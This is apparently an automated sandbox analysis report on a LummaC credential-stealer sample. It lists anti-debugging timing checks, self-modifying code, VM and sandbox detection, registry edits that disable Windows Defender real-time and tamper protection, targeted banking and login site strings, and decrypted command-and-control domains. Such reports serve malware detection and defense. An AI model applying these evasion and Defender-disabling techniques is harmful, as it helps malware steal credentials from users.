          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9C8B9C second address: 9C8BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9C8BAD second address: 9C8BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9C8BB1 second address: 9C8BBB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4F28CDCB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9C8E90 second address: 9C8E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9C8E94 second address: 9C8E9E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4F28CDCB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9C8E9E second address: 9C8EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jng 00007F4F296427A6h 0x0000000c rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9CAD3D second address: 9CAD53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4F28CDCB72h 0x00000009 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9CAE3A second address: 9CAE75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F4F296427B7h 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9CAE75 second address: 9CAE79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9CAE79 second address: 9CAE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F4F296427A6h 0x0000000e rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9CAE87 second address: 9CAEAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jl 00007F4F28CDCB6Eh 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9CB19F second address: 9CB1A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9CB1A4 second address: 9CB1AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9CB1AA second address: 9CB1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4F296427AEh 0x0000000f rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9CB340 second address: 9CB348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9CB348 second address: 9CB34E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9CB527 second address: 9CB52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9CB944 second address: 9CB951 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9CB951 second address: 9CB955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9CBEA8 second address: 9CBEAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9CBF91 second address: 9CBFC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007F4F28CDCB6Eh 0x00000010 nop 0x00000011 mov si, dx 0x00000014 push eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9CBFC3 second address: 9CBFC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9CBFC7 second address: 9CBFCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9CBFCB second address: 9CBFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9CF3FB second address: 9CF401 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9D0962 second address: 9D0967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9D0967 second address: 9D09E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007F4F28CDCB66h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F4F28CDCB68h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 add esi, 36356705h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F4F28CDCB68h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b add dword ptr [ebp+122D301Ch], edi 0x00000051 push 00000000h 0x00000053 jmp 00007F4F28CDCB6Fh 0x00000058 xchg eax, ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F4F28CDCB70h 0x00000060 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9D15DE second address: 9D15E4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9D15E4 second address: 9D1613 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 movsx edi, bx 0x0000000c push 00000000h 0x0000000e cmc 0x0000000f push 00000000h 0x00000011 jno 00007F4F28CDCB6Ch 0x00000017 push eax 0x00000018 pushad 0x00000019 jne 00007F4F28CDCB6Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9D2F9B second address: 9D2FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9D4EA6 second address: 9D4F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F4F28CDCB68h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 sub dword ptr [ebp+12453E0Ah], ecx 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D3AB5h], edi 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007F4F28CDCB68h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e mov ebx, dword ptr [ebp+124532B4h] 0x00000054 push eax 0x00000055 pushad 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9D4F0D second address: 9D4F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F296427B2h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Tries to evade debugger and weak emulator (self modifying code)
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeSpecial instruction interceptor: First address: 81DC77 instructions caused by: Self-modifying code
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeSpecial instruction interceptor: First address: 9BFF9C instructions caused by: Self-modifying code
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeSpecial instruction interceptor: First address: 9C9922 instructions caused by: Self-modifying code
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeSpecial instruction interceptor: First address: A5854A instructions caused by: Self-modifying code
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeMemory allocated: 4B30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeMemory allocated: 4E50000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeMemory allocated: 6E50000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeCode function: 3_2_009BD180 rdtsc 3_2_009BD180
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 7460Thread sleep time: -270000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exe TID: 7876Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: file.exe, 00000000.00000002.1613886287.0000000001174000.00000040.00000001.01000000.00000003.sdmp, 7V52BG1QZHX6WU0LEYA.exe, 00000003.00000002.1752196760.00000000009A2000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
          Source: file.exe, 00000000.00000003.1609473315.00000000014DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1609473315.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1619866757.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521824876.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1619549987.000000000148E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521824876.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1619866757.00000000014DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
          Source: file.exe, 00000000.00000003.1463701799.0000000005D1A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
          Source: file.exe, 00000000.00000002.1613886287.0000000001174000.00000040.00000001.01000000.00000003.sdmp, 7V52BG1QZHX6WU0LEYA.exe, 00000003.00000002.1752196760.00000000009A2000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
          Source: file.exe, 00000000.00000003.1463701799.0000000005D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Hides threads from debuggers
          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeThread information set: HideFromDebuggerJump to behavior
          Tries to detect sandboxes and other dynamic analysis tools (window names)
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeOpen window title or class name: regmonclass
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeOpen window title or class name: gbdyllo
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeOpen window title or class name: procmon_window_class
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeOpen window title or class name: ollydbg
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeOpen window title or class name: filemonclass
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeFile opened: NTICE
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeFile opened: SICE
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeFile opened: SIWVID
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeCode function: 3_2_009BD180 rdtsc 3_2_009BD180
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeCode function: 3_2_0081B974 LdrInitializeThunk,3_2_0081B974
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          LummaC encrypted strings found
          Source: file.exe, 00000000.00000003.1379784660.00000000051B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: scriptyprefej.store
          Source: file.exe, 00000000.00000003.1379784660.00000000051B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: navygenerayk.store
          Source: file.exe, 00000000.00000003.1379784660.00000000051B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: founpiuer.store
          Source: file.exe, 00000000.00000003.1379784660.00000000051B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacedmny.store
          Source: file.exe, 00000000.00000003.1379784660.00000000051B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: thumbystriw.store
          Source: file.exe, 00000000.00000003.1379784660.00000000051B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: fadehairucw.store
          Source: file.exe, 00000000.00000003.1379784660.00000000051B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crisiwarny.store
          Source: file.exe, 00000000.00000003.1379784660.00000000051B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: presticitpo.store
          Source: 7V52BG1QZHX6WU0LEYA.exeBinary or memory string: \Program Manager
          Source: 7V52BG1QZHX6WU0LEYA.exe, 00000003.00000002.1752448579.00000000009E3000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: \Program Manager
          Source: file.exe, 00000000.00000002.1614856529.00000000011B8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: qProgram Manager
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Disable Windows Defender notifications (registry)
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior
          Disable Windows Defender real time protection (registry)
          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1Jump to behavior
          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1Jump to behavior
          Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\NotificationsRegistry value created: DisableNotifications 1Jump to behavior
          Disables Windows Defender Tamper protection
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRegistry value created: TamperProtection 0Jump to behavior
          Modifies windows update settings
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptionsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdatesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocationsJump to behavior
          Source: file.exe, 00000000.00000003.1610052449.0000000001547000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1609473315.0000000001532000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1620165898.0000000001548000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: les%\Windows Defender\MsMpeng.exe
          Source: file.exe, 00000000.00000003.1521824876.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1521824876.0000000001548000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Yara detected LummaC Stealer
